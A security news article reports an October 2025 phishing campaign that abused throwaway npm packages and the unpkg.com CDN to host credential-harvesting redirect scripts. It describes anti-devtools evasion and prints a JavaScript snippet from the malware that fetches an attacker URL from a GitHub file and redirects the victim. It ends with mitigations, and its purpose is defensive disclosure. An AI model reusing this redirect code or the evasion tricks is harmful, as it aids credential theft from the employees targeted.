In October 2025, security researchers uncovered an unprecedented phishing campaign that weaponizes the npm ecosystem—not by infecting developers during package installation, but by abusing the unpkg.com CDN as a disposable hosting platform for malicious JavaScript.
By seeding over 175 throwaway npm packages, attackers have turned a trusted open source delivery network into a large-scale phishing infrastructure targeting enterprise employees across Europe’s industrial, technology, and energy sectors.
Rather than embedding malware in popular modules, adversaries created hundreds of ephemeral packages matching the pattern redirect-[a-z0-9]{6}.
Each package contains a minimal JavaScript file named beamglea.js and crafted HTML “business document” lures. When a victim opens one of these HTML files in a browser, it automatically loads the malicious script directly from unpkg.com via a tag such as:
xml
The loaded script immediately redirects the user to a credential-harvesting site. To enhance phishing effectiveness, the URL fragment passes the victim’s email address so the form appears pre-filled, providing a strong trust cue while evading server logs.
Campaign Execution
Initial public traces of this infrastructure appeared on September 24, 2025. On October 9, Socket disclosed 175 malicious packages under the codename “Beamglea,” impacting more than 135 organizations.
A follow-up analysis by Snyk on October 10 uncovered a related cluster using mad-x.x.x.x.x.x naming, suggesting either a copycat operation or parallel research by the same threat actor.
The “mad” packages target a broader audience by masquerading as a fake “Cloudflare Security Check” page. When the user checks an “I am not a robot” box, anti-devtools logic and frame-busting techniques run before fetching a remote GitHub-hosted file containing the attacker’s payload URL.
Key features include disabling right-click, blocking F12 and common inspection shortcuts, and blanking the page if developer tools are detected.
Upon successful verification, the script reads the URL from the GitHub file and redirects the parent window to the phishing page.
javascriptdocument.querySelector('.checkbox-container').addEventListener('change', function() {
if (!this.checked) return;
// Simulate verification delay
setTimeout(() => {
const urlFile="https://raw.githubusercontent.com/.../mad4.txt";
fetch(urlFile, { method: 'GET', cache: 'no-store' })
.then(res => res.text())
.then(text => {
const target = text.trim();
if (!/^https?:///i.test(target)) return;
try {
window.top.location.href = target;
} catch (e) {
window.location.href = target;
}
});
}, 1000 + Math.random() * 1000);
});
Mitigations
Although this campaign does not compromise package install processes, it highlights the expanding threat landscape within the open source software supply chain. Organizations should:
- Treat any external script loads via unpkg.com as high risk, especially those embedded in email-delivered HTML files.
- Implement email gateway filters to strip or quarantine HTML attachments referencing unpkg.com.
- Educate employees about phishing tactics that leverage trusted CDNs and pre-filled credential forms.
- Monitor outbound web requests for patterns matching the
redirect-*andmad-*naming conventions. - Collaborate with npm registry maintainers and CDN operators to flag and remove throwaway packages at scale.
As attackers continue probing new methods to weaponize open source infrastructure, defenders must extend supply chain vigilance beyond installation-based threats and secure every step of the software delivery and consumption lifecycle.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
